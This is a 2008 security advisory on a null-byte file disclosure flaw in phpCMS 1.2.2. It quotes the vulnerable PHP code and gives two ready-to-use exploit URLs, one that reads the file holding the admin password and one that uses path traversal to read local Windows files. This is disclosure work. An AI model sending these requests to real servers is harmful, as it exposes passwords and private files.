Remote File Disclosure in phpCMS 1.2.2

Digital Security Research Group [DSecRG] Advisory #DSECRG-08-005

Application: phpCMS
Versions Affected: 1.2.2
Vendor URL: http://www.phpcms.de
Bug: Remote File Disclosure, Get admin password
Exploits: YES
Reported: 10.01.2008
Vendor response: 12.01.2008
Date of Public Advisory: 29.01.2008
Authors: Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description

---

phpCMS system has remote File Disclosure vulnerability in page /parser/include/class.cache_phpcms.php

Details

---

Attacer can read any files in web directory.

In file parser/parser.php include class.cache_phpcms.php

---

    // Load the i18n Handler
    if (isset ($_GET ['file']) && isset($DEFAULTS->I18N) && 'on' == $DEFAULTS->I18N) {
            include(PHPCMS_INCLUDEPATH.'/class.lib_i18n_phpcms.php');
            $I18N = &new i18n;
    }
    $PHPCMS->check_secure_stealth();
    include(PHPCMS_INCLUDEPATH.'/class.cache_phpcms.php');
    exit;

---

In file class.cache_phpcms.php function GetFile() parse URL and return full file name or default value.
Function checks file extension but does't check for null byte injection.

To read file attacker must append a valid extension with null byte to file like a "%00.gif" or smth.

---

// filequery exists, but filename is empty? -> set the defaultvalue for filename
if(!stristr($temp, $DEFAULTS->PAGE_EXTENSION) AND
!stristr($temp, '.gif') AND
!stristr($temp, '.png') AND
!stristr($temp, '.jpg') AND
!stristr($temp, '.js') AND
!stristr($temp, '.css') AND
!stristr($temp, '.htm') AND
!stristr($temp, '.html'))

{ if(substr($temp, -1) != '/') {
$temp = trim($temp).'/'.$DEFAULTS->PAGE_DEFAULTNAME;
$temp.= $DEFAULTS->PAGE_EXTENSION;
} else {
$temp = trim($temp).$DEFAULTS->PAGE_DEFAULTNAME;
$temp.= $DEFAULTS->PAGE_EXTENSION;
}
}

---

In file class.cache_phpcms.php function CheckFile() take file name and if file exist read it and print file contents.

---

$PfadUndDatei = $this->GetFile();

$this->name = basename($PfadUndDatei);
$this->path = dirname($PfadUndDatei);
…

// there's no contentfile with this name -> errorpage or errormessage
if(!file_exists($DEFAULTS->DOCUMENT_ROOT.$this->path.'/'.$this->name)) {
$errorname = basename($DEFAULTS->ERROR_PAGE_404);
$errorpath = dirname($DEFAULTS->ERROR_PAGE_404);
…
…

$fsize = filesize($DEFAULTS->DOCUMENT_ROOT.$this->path.'/'.$this->name);
$fd = fopen($DEFAULTS->DOCUMENT_ROOT.$this->path.'/'.$this->name, "rb");
$contents = fread($fd, $fsize);
$contents = trim($contents);
$fsize = strlen($contents);
fclose($fd);
…

echo $contents;

---

Example:

http://[server]/[installdir]/parser/parser.php?file=/parser/include/default.php%00.gif

default.php includes admin password and other defaults:

---

class defaults {
function defaults() {
global $PHP, $PHPCMS;
if(!defined("DEFAULTS")) {
define("DEFAULTS", TRUE);
}

            $this->PASS = 'YourPasswordHere';

…

---

In windows we can read any local file:

http://[server]/[installdir]/parser/parser.php?file=\…\…\…\…\…\…\…\…\…\…\boot.ini%00.gif

http://www.phpcms.de/download/index.en.html

About

---

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)

–

Digital Security Research Group
mailto:[email protected]